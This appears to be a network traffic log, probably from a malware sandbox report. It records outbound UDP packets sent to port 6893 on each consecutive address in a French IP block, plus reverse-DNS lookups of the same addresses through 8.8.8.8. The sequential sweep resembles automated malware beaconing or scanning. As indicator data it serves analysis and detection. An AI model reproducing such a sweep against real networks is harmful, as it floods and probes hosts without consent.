FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 0.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 32.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 33.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 34.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 35.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 36.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 37.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 38.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 39.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 40.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 41.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 42.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 43.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 45.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 44.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 46.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 47.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 48.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 49.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 50.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 51.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 52.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 53.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 54.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 55.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 56.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 57.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 58.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 59.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 60.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 61.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 62.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 63.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 64.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 65.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 66.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 67.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 68.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 69.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 70.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 71.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 72.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 73.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 74.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 75.160.33.178.in-addr.arpa udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
FR 178.33.161.21:6893 udp
FR 178.33.161.22:6893 udp
FR 178.33.161.23:6893 udp
FR 178.33.161.24:6893 udp
FR 178.33.161.25:6893 udp
FR 178.33.161.26:6893 udp
FR 178.33.161.27:6893 udp
FR 178.33.161.28:6893 udp
FR 178.33.161.29:6893 udp
FR 178.33.161.30:6893 udp
FR 178.33.161.31:6893 udp
FR 178.33.161.32:6893 udp
FR 178.33.161.33:6893 udp
FR 178.33.161.34:6893 udp
FR 178.33.161.35:6893 udp
FR 178.33.161.36:6893 udp
FR 178.33.161.37:6893 udp
FR 178.33.161.38:6893 udp
FR 178.33.161.39:6893 udp
FR 178.33.161.40:6893 udp
FR 178.33.161.41:6893 udp
FR 178.33.161.42:6893 udp
FR 178.33.161.43:6893 udp
FR 178.33.161.44:6893 udp
FR 178.33.161.45:6893 udp
FR 178.33.161.46:6893 udp
FR 178.33.161.47:6893 udp
FR 178.33.161.48:6893 udp
FR 178.33.161.49:6893 udp
FR 178.33.161.50:6893 udp
FR 178.33.161.51:6893 udp
FR 178.33.161.52:6893 udp
FR 178.33.161.53:6893 udp
FR 178.33.161.54:6893 udp
FR 178.33.161.55:6893 udp
FR 178.33.161.56:6893 udp
FR 178.33.161.57:6893 udp
FR 178.33.161.58:6893 udp
FR 178.33.161.59:6893 udp
FR 178.33.161.60:6893 udp
FR 178.33.161.61:6893 udp
FR 178.33.161.62:6893 udp
FR 178.33.161.63:6893 udp
FR 178.33.161.64:6893 udp
FR 178.33.161.65:6893 udp
FR 178.33.161.66:6893 udp
FR 178.33.161.67:6893 udp
FR 178.33.161.68:6893 udp
FR 178.33.161.69:6893 udp
FR 178.33.161.70:6893 udp
FR 178.33.161.71:6893 udp
FR 178.33.161.72:6893 udp
FR 178.33.161.73:6893 udp
FR 178.33.161.74:6893 udp
FR 178.33.161.75:6893 udp
FR 178.33.161.76:6893 udp
FR 178.33.161.77:6893 udp
FR 178.33.161.78:6893 udp
FR 178.33.161.79:6893 udp
FR 178.33.161.80:6893 udp
FR 178.33.161.81:6893 udp
FR 178.33.161.82:6893 udp
FR 178.33.161.83:6893 udp
FR 178.33.161.84:6893 udp
FR 178.33.161.85:6893 udp
FR 178.33.161.86:6893 udp
FR 178.33.161.87:6893 udp
FR 178.33.161.88:6893 udp
FR 178.33.161.89:6893 udp
FR 178.33.161.90:6893 udp
FR 178.33.161.91:6893 udp
FR 178.33.161.92:6893 udp
FR 178.33.161.93:6893 udp
FR 178.33.161.94:6893 udp
FR 178.33.161.95:6893 udp
FR 178.33.161.96:6893 udp
FR 178.33.161.97:6893 udp
FR 178.33.161.98:6893 udp
FR 178.33.161.99:6893 udp
FR 178.33.161.100:6893 udp
FR 178.33.161.101:6893 udp
FR 178.33.161.102:6893 udp
FR 178.33.161.103:6893 udp
FR 178.33.161.104:6893 udp
FR 178.33.161.105:6893 udp
FR 178.33.161.106:6893 udp
FR 178.33.161.107:6893 udp
FR 178.33.161.108:6893 udp
FR 178.33.161.109:6893 udp
FR 178.33.161.110:6893 udp
FR 178.33.161.111:6893 udp
FR 178.33.161.112:6893 udp
FR 178.33.161.113:6893 udp
FR 178.33.161.114:6893 udp
FR 178.33.161.115:6893 udp
FR 178.33.161.116:6893 udp
FR 178.33.161.117:6893 udp
FR 178.33.161.118:6893 udp
FR 178.33.161.119:6893 udp
FR 178.33.161.120:6893 udp
FR 178.33.161.121:6893 udp
FR 178.33.161.122:6893 udp
FR 178.33.161.123:6893 udp
FR 178.33.161.124:6893 udp
FR 178.33.161.125:6893 udp
FR 178.33.161.126:6893 udp
FR 178.33.161.127:6893 udp
FR 178.33.161.128:6893 udp
FR 178.33.161.129:6893 udp
FR 178.33.161.130:6893 udp
FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
US 8.8.8.8:53 76.160.33.178.in-addr.arpa udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
US 8.8.8.8:53 77.160.33.178.in-addr.arpa udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
US 8.8.8.8:53 78.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 79.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 80.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 81.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 82.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 83.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 84.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 85.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 86.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 87.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 88.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 89.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 91.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 90.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 92.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 93.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 94.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 95.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 96.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 97.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 98.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 99.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 100.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 101.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 102.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 103.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 104.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 105.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 106.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 107.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 108.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 109.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 111.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 110.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 112.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 113.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 115.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 114.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 116.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 117.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 118.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 119.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 120.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 121.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 122.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 123.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 125.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 126.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 127.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 128.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 129.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 130.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 131.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 132.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 134.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 133.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 135.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 136.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 137.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 138.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 139.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 140.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 141.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 142.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 143.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 144.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 145.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 146.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 147.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 148.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 149.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 150.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 151.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 152.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 153.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 154.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 155.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 157.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 156.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 158.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 159.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 160.160.33.178.in-addr.arpa udp
